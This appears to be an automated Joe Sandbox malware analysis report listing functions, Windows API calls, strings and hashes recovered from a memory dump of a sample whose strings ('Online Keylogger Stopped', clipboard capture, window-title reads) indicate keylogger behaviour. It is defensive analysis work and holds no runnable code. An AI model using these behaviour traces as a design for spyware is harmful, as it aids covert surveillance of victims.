LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536

Function 00419F87 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00419FBE
CloseHandle.KERNEL32(00000000), ref: 00419FC9
CloseHandle.KERNEL32(00000000), ref: 00419FD1

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameOpenProcess
String ID:
API String ID: 3706008839-0
Opcode ID: a23d0fe8114767c15cdde0a498d95ac820affdde2608e9dac14c7f136773ffec
Instruction ID: 9bf07e75ebb9e679cccba50474e497f26c5128b29002f083bca96ca2400931d7
Opcode Fuzzy Hash: a23d0fe8114767c15cdde0a498d95ac820affdde2608e9dac14c7f136773ffec
Instruction Fuzzy Hash: D1F0E93124031477D7A067589C0DFE7766CC790B51F100276F508D72E1DEA99C82469A

Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB

Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F

Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004401ED

Strings

pow, xrefs: 004401C5, 004401E2

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F

Function 00442B2D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00442C15
__freea.LIBCMT ref: 00442C9B

Strings

@8T, xrefs: 00442B3F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: @8T
API String ID: 1635606685-4097998276
Opcode ID: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
Opcode Fuzzy Hash: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E

Function 004126FE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412737

Part of subcall function 00412446: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
Part of subcall function 00412446: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC

RegCloseKey.ADVAPI32(00000000,00463050,00463050,00469654,00469654,00000071), ref: 004128A5

Strings

P0F, xrefs: 00412886

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuery
String ID: P0F
API String ID: 1014704025-3540264436
Opcode ID: 9f717ca826b6a5a7a1eae360a6ab8c236bfe6e8983a6c7b42836fe175bb5bbc9
Instruction ID: 2d28d635716c3df90d830f6dadb90dee404f775c6aa34bcd6e72966151b01206
Opcode Fuzzy Hash: 9f717ca826b6a5a7a1eae360a6ab8c236bfe6e8983a6c7b42836fe175bb5bbc9
Instruction Fuzzy Hash: 9D41F3306442405BC324F625D992AEFB299AFD1344F40893FB44A631D2EEBC5D4A86AE

Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

__Init_thread_footer.LIBCMT ref: 0040A6E3

Strings

[Text copied to clipboard], xrefs: 0040A732
[End of clipboard], xrefs: 0040A725

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 4cc0d1ac8e06a4ff285c7657cb7b4d16e2efbbcbde28276865f6a5bca21e441d
Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
Opcode Fuzzy Hash: 4cc0d1ac8e06a4ff285c7657cb7b4d16e2efbbcbde28276865f6a5bca21e441d
Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D

Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2

Strings

OCP, xrefs: 0044ED6B
ACP, xrefs: 0044ED35

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C

Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
IsWindowVisible.USER32(?), ref: 00415B37

Strings

(%G, xrefs: 00415BDC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Window$TextVisible
String ID: (%G
API String ID: 1670992164-3377777310
Opcode ID: 9e4763bd1cf6ba5bf80e6359ca4df74b646347378df584ac5dd90118999f6643
Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
Opcode Fuzzy Hash: 9e4763bd1cf6ba5bf80e6359ca4df74b646347378df584ac5dd90118999f6643
Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A

Function 0043A3B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0043A47A

Strings

@F, xrefs: 0043A429
@F, xrefs: 0043A430

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CallFilterFunc@8
String ID: @F$@F
API String ID: 4062629308-3436687868
Opcode ID: 01be4156570bba91bd41b6ba4955b04eb027de8bcb16e70c41f215e4a53bdf77
Instruction ID: d046661977b9f70fa2c81c6cfd40d9a104c7fef52231e330e595ae3c7a73c1ff
Opcode Fuzzy Hash: 01be4156570bba91bd41b6ba4955b04eb027de8bcb16e70c41f215e4a53bdf77
Instruction Fuzzy Hash: 2F214C3165020056D7186B799D0636F33915F5D338F28A31FF8A18B3E1E7BC8962860F

Function 0043A7F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0043A8BC

Strings

@F, xrefs: 0043A86B
@F, xrefs: 0043A872

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CallFilterFunc@8
String ID: @F$@F
API String ID: 4062629308-3436687868
Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
Instruction ID: 70967ea4cb1e6682f5d06301c8bd88165fdf16009f8cb562ef1cc0c82826ef49
Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
Instruction Fuzzy Hash: 4C212531A5021086C71CBB799C0236E7391AF4D338F28675FF8A29A2D1E77C8953864F

Function 0044BDCA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044BE70

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

Strings

pF, xrefs: 0044BE68
KS, xrefs: 0044BE52, 0044BE63, 0044BE7D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID: pF$KS
API String ID: 1353095263-4051209147
Opcode ID: 9c9b1892929c326675bb102bdb2c5e852900ab225de85b6b9f7e2b64198450d9
Instruction ID: 55a4a27b62ea69fcd5177a700e9921c5dc883134b6193b34980b9784b8bdd257
Opcode Fuzzy Hash: 9c9b1892929c326675bb102bdb2c5e852900ab225de85b6b9f7e2b64198450d9
Instruction Fuzzy Hash: 2C21BE78200200DFE310DF1DE881E9177E4EF5D31872505AAF689CB3B2E666EC40CB99

Function 004474F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0044753C
GetFileType.KERNEL32(00000000), ref: 0044754E

Strings

0]T, xrefs: 00447585

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: 0]T
API String ID: 3000768030-3090778742
Opcode ID: 584d983f07588d59a80cd593781a2b5952fd179e8a6c53e317df8b7e088317fe
Instruction ID: f3e64406935b1962c0d1e5831b9f441d98c156aa3d193b91852e36c68e8d9cf3
Opcode Fuzzy Hash: 584d983f07588d59a80cd593781a2b5952fd179e8a6c53e317df8b7e088317fe
Instruction Fuzzy Hash: 5C113A7150C7416AE7304E3D9C882237B94A756331B78072BD0B6CBAF2C738E983964E

Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
___raise_securityfailure.LIBCMT ref: 00432E76

Strings

(F, xrefs: 00432E71

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (F
API String ID: 3761405300-3109638091
Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F

Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

| , xrefs: 00419527
%02i:%02i:%02i:%03i , xrefs: 00419509

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: e17ac6180e740d8127f14c5964bc4a28a6771087d9435cdaa38a9718e52cab03
Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
Opcode Fuzzy Hash: e17ac6180e740d8127f14c5964bc4a28a6771087d9435cdaa38a9718e52cab03
Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A

Function 00412077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041209B
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004120D1

Strings

P0F, xrefs: 00412096

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: P0F
API String ID: 3660427363-3540264436
Opcode ID: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
Instruction ID: 333f44122c6306c69f78a99928583bd7e211529a197e6eb40258ce4aa2bc4044
Opcode Fuzzy Hash: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
Instruction Fuzzy Hash: 5101DFB6A0010CBFEB14DB91DC06EFE7BBDEB48210F00017AFA04E2200E6B16F0096B4

Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CloseHandle.KERNEL32(?), ref: 00409FFD
UnhookWindowsHookEx.USER32 ref: 0040A010

Strings

Online Keylogger Stopped, xrefs: 00409FAA, 00409FB2, 00409FD9

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: dd94839f5298d425d34c33682383094e81a47364d328da6cff6cdccbfe171a6b
Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
